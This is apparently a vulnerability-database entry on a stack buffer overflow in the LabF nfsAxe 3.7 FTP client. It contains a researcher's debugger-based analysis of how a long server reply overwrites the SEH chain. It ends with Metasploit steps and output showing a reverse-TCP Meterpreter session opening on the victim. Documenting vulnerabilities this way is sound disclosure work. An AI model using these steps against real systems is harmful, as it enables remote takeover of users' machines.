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HistoryJan 22, 2018 - 12:00 a.m.

LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow






Buffer Overflow in the FTP client in LabF nfsAxe 3.7 allows remote FTP servers to execute arbitrary code via a long reply.

Recent assessments:

wchen-r7 at September 12, 2019 6:07pm UTC reported:

This is plib_free__3()
0:001> g
Destination buffer for WS2_32!recv() is at: 0x0233f4f4

Now we have located the destination buffer, and we know that eventually this will overflow.
But we need to determine how this pointer is passed around.

If we manaully cross-reference what other functions are passing a buffer pointer to ```sub_4383C0()```,
you will notice there are too many stack buffer overflows. This took some time and breakpoints to figure
out, but the correct code path for the our vulnerability should be:

sub_42C890() –> sub_42EE10() –> sub_42EA00() –> sub_4383C0()

Inside ```sub_42C890()```, we find the stack buffer:

AUTO:0042C8FF loc_42C8FF: ; CODE XREF: sub_42C890+16Aj
AUTO:0042C8FF ; sub_42C890+1B5j
AUTO:0042C8FF push edi
AUTO:0042C900 mov ebx, 3FFh
AUTO:0042C905 lea edx, [esp+2424h+var_41C]
AUTO:0042C90C push 1
AUTO:0042C90E mov eax, ds:dword_465100
AUTO:0042C913 mov ecx, edi
AUTO:0042C915 call sub_42EE10

And var_41C is 1024 bytes:

-0000041C var_41C db 1024 dup(?)

Once we know where the stack buffer comes from, we can move on to how the exploit crashes ftp.exe.
We can observe this crash by setting up these breakpoints first to track the buffer pointer:

bp 0042c915 β€œ.printf \β€œPassing static buffer pointer at 0x%08x\”, edx; .echo ;g”
bp 0042ea0c β€œ.printf \β€œDestination buffer for receive is: 0x%08x\n\”, edx; .echo; g”
bp 0042eb73 β€œ.printf \β€œEDX Text dump: %ma\n\”, edx; .echo; .echo; g”

The WinDBG output with the above breakpoints:

Passing static buffer pointer at 0x027ff4f4
Destination buffer for receive is: 0x027ff4f4
EDX Text dump: AAAAAAAAAAAAAAA ……… AAAAAAAAAAAAAAA (a very long string)

(d48.864): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=000003fe ecx=ffffdbfc edx=000003fe esi=027ffc02 edi=02800000
eip=0042cac5 esp=027fd4ec ebp=000023ee iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
0042cac5 8807 mov byte ptr [edi],al ds:0023:02800000=??

In this crash, ESI is the source input, which is filled with our malicious input:

0:001> dd esi
027ffc02 41414141 41414141 41414141 41414141
027ffc12 41414141 41414141 41414141 41414141
027ffc22 41414141 41414141 41414141 41414141
027ffc32 41414141 41414141 41414141 41414141
027ffc42 41414141 41414141 41414141 41414141
027ffc52 41414141 41414141 41414141 41414141
027ffc62 41414141 41414141 41414141 41414141
027ffc72 41414141 41414141 41414141 41414141

EDI would be the destination buffer used for this copy routine:

AUTO:0042CAC3 loc_42CAC3: ; CODE XREF: sub_42C890+249j
AUTO:0042CAC3 mov al, [esi] ; ESI is the malicious input
AUTO:0042CAC5 mov [edi], al ; EDI = our buffer, and AL is a byte from the malicious input
AUTO:0042CAC7 cmp al, 0 ; Check null byte
AUTO:0042CAC9 jz short loc_42CADB ; Done copying
AUTO:0042CACB mov al, [esi+1] ; The next byte
AUTO:0042CACE add esi, 2
AUTO:0042CAD1 mov [edi+1], al
AUTO:0042CAD4 add edi, 2
AUTO:0042CAD7 cmp al, 0
AUTO:0042CAD9 jnz short loc_42CAC3 ; Continue copying if string isn’t null

Since the exploit supplies a string that is long enough, the SEH chain on the stack is also

0:001> !exchain
027fff70: 41414141
Invalid exception stack at 41414141

The exploit simply overwrites the SEH chain to gain arbitrary code execution.

## Verification Steps

To test the exploit:

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/windows/ftp/labf_nfsaxe`
4. Set options and payload
5. Do: `exploit`
6. Connect to the FTP server using the FTP client
7. You should get a session like the following demonstration:

msf exploit(windows/ftp/labf_nfsaxe) > run

[] Started reverse TCP handler on
] Please ask your target(s) to connect to
[] Server started.
msf exploit(windows/ftp/labf_nfsaxe) >
] – connected.
[] – Response: Sending 220 Welcome
] – Request: AUTH GSSAPI
[] – Response: sending 331 OK
] – Request: ADAT TlRMTVNTUA==
[] – Response: Sending 230 OK
] – Request: USER Guest
[] – Request: Sending the malicious response
] Sending stage (179779 bytes) to
[*] Meterpreter session 1 opened ( –> at 2018-01-09 22:38:33 -0600

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0





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